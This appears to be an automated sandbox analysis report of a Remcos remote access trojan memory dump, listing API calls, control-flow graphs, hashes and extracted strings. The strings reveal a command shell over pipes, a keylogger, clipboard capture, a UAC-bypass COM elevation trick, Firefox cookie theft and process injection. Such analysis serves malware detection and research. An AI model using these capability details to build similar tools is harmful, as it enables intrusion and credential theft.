                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                                      • Opcode ID: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                                                                                                                      • Instruction ID: 67a772f1b96ce562b336c628e562ce1c63ba93f9b2d947f4b03656f810f331b8
                                                                                                                                                                                      • Opcode Fuzzy Hash: b34b3b4b83b21344277d15047b5fba51ecc245e821c78927fd7bd009bf1ff183
                                                                                                                                                                                      • Instruction Fuzzy Hash: E61160315047524AE7304E3E8CC86677AD5AB56335B380B2FD5B6876F1C638DC82AA49
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 534 4484ca-4484f4 535 4484f6-4484f8 534->535 536 44855f 534->536 537 4484fe-448504 535->537 538 4484fa-4484fc 535->538 539 448561-448565 536->539 540 448506-448508 call 448566 537->540 541 448520 537->541 538->539 544 44850d-448510 540->544 543 448522-448524 541->543 545 448526-448534 GetProcAddress 543->545 546 44854f-44855d 543->546 547 448541-448547 544->547 548 448512-448518 544->548 549 448536-44853f call 43436e 545->549 550 448549 545->550 546->536 547->543 548->540 552 44851a 548->552 549->538 550->546 552->541
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0044852A
                                                                                                                                                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2279764990-0
                                                                                                                                                                                      • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                                                                                                                                      • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                                                                                                                                                                                      • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 554 40165e-401664 555 401666-401668 554->555 556 401669-401674 554->556 557 401676 556->557 558 40167b-401685 556->558 557->558 559 401687-40168d 558->559 560 4016a8-4016a9 call 4344ea 558->560 559->560 561 40168f-401694 559->561 564 4016ae-4016af 560->564 561->557 563 401696-4016a6 call 4344ea 561->563 566 4016b1-4016b3 563->566 564->566
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                                                                                                                                      • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 582 445af3-445afe 583 445b00-445b0a 582->583 584 445b0c-445b12 582->584 583->584 585 445b40-445b4b call 4405dd 583->585 586 445b14-445b15 584->586 587 445b2b-445b3c RtlAllocateHeap 584->587 592 445b4d-445b4f 585->592 586->587 588 445b17-445b1e call 445545 587->588 589 445b3e 587->589 588->585 595 445b20-445b29 call 442f80 588->595 589->592 595->585 595->587
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004482CA,00000001,00000364,?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000), ref: 00445B34
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                                                                                                                                                      • Instruction ID: e1e4bc9e3ed5bc60ab2f969cc6486aa84e060793a1580145f61584a75d3ee698
                                                                                                                                                                                      • Opcode Fuzzy Hash: c045d3e2a3584f06f9c551ababd1bb43ae743c3abb802e5b049e03d8e1594b29
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9DF09031600D6967BF316A229C06B5BB749EB42760B548027BD08AA297CA38F80186BC
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 598 446137-446143 599 446175-446180 call 4405dd 598->599 600 446145-446147 598->600 607 446182-446184 599->607 602 446160-446171 RtlAllocateHeap 600->602 603 446149-44614a 600->603 604 446173 602->604 605 44614c-446153 call 445545 602->605 603->602 604->607 605->599 610 446155-44615e call 442f80 605->610 610->599 610->602
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                      • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                                                                                      • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                                                                                                                                                                                      • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                                                                      • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660BC,00000000), ref: 004057B6
                                                                                                                                                                                      • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                                                                      • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004058BC
                                                                                                                                                                                      • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                                                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,004660C0,00000062,004660A4), ref: 004059E4
                                                                                                                                                                                      • Sleep.KERNEL32(00000064,00000062,004660A4), ref: 004059FE
                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                                                                      • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                                                                      • API String ID: 2994406822-18413064
                                                                                                                                                                                      • Opcode ID: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                                                                                                                                                                      • Instruction ID: 70e6a120cd26ef4d63fea04585a98dfb86eec3f3f3d93349c630b188a9e88b71
                                                                                                                                                                                      • Opcode Fuzzy Hash: ff9017fe4a47b23c9c3faeacfcf4d74826474996782d69eafc0bdbb16b5f5ff1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8891E471604604AFD711FB36ED42A6F369AEB84308F01443FF989A62E2DB7D9C448B5D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00412106
                                                                                                                                                                                        • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                                                                                                                                                        • Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
                                                                                                                                                                                        • Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB
                                                                                                                                                                                      • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00412146
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412155
                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 004121AB
                                                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041241A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                                                                      • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                                                                      • API String ID: 3018269243-13974260
                                                                                                                                                                                      • Opcode ID: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                                                                                                                                                                      • Instruction ID: 8205490d34a3093c97c97cf0412c87f535f0d81ed9353c04b1464aab831027f3
                                                                                                                                                                                      • Opcode Fuzzy Hash: d6daba7efe88dd7c886cc9b50d5ab07a0a3d3aefa5ec7567085e39cb97412374
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2671813160430167C614FB72CD579AE73A4AF90308F50057FB546A61E2FFBC9949C69E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenClipboard.USER32 ref: 004168C2
                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 004168D0
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004168F0
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004168F9
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041692F
                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00416938
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416955
                                                                                                                                                                                      • OpenClipboard.USER32 ref: 0041695C
                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00416984
                                                                                                                                                                                        • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                      • String ID: !D@
                                                                                                                                                                                      • API String ID: 3520204547-604454484
                                                                                                                                                                                      • Opcode ID: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                                                                                                                                                                      • Instruction ID: 9e7c9e91df33a813dd3aefbd505e3631e00017b2d00f6ad0929271c723fa7fba
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3da19db2da9e38382dfa1a35b9112d29995025b8f82a0e1631b12ced5ccb0bf8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F212171604301DBD714BB71DC5DABE36A9AF88746F40043EF946921E2EF3C8D45C66A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F563
                                                                                                                                                                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                                                                                                                                        • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F66E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                                                                                                                                                                      • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                                                                                                                                                                      • API String ID: 3756808967-1743721670
                                                                                                                                                                                      • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                                                                                                                                                                      • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                                                                                                                                                                                      • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                                                                                                                                                                                      • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 0$1$2$3$4$5$6$7$VG
                                                                                                                                                                                      • API String ID: 0-1861860590
                                                                                                                                                                                      • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                                                                                                                                                                      • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                                                                                                                                                                                      • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00407521
                                                                                                                                                                                      • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Object_wcslen
                                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                      • API String ID: 240030777-3166923314
                                                                                                                                                                                      • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                                                                                      • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                                                                                                                                                                                      • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                                                                                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041A7BB
                                                                                                                                                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3587775597-0
                                                                                                                                                                                      • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                                                                                                                                                                      • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                                                                                                                                                                                      • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                                                                                                                        • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                                                                                                                                        • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                                                                                                                                                        • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                                                                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                                                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                                                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                      • String ID: lJD$lJD$lJD
                                                                                                                                                                                      • API String ID: 745075371-479184356
                                                                                                                                                                                      • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                                      • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                                                                                                                      • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                                                                                      • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040C47D
                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                      • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                      • API String ID: 1164774033-405221262
                                                                                                                                                                                      • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                                                                                                                                                                      • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                                                                                                                                                                      • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                                                                                                                      • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                                                                                                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                                                                                      • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                                                                                                                      • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000001A.00000002.1744671079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_26_2_400000_csc.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                      • String ID: Keylogger initialization failure: error $`Wu
                                                                                                                                                                                      • API String ID: 3219506041-303027793
                                                                                                                                                                                      • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                                                                                                                                                                      • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                                                                                                                                                                                      • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                                                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                                                                                                                                                                                        • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
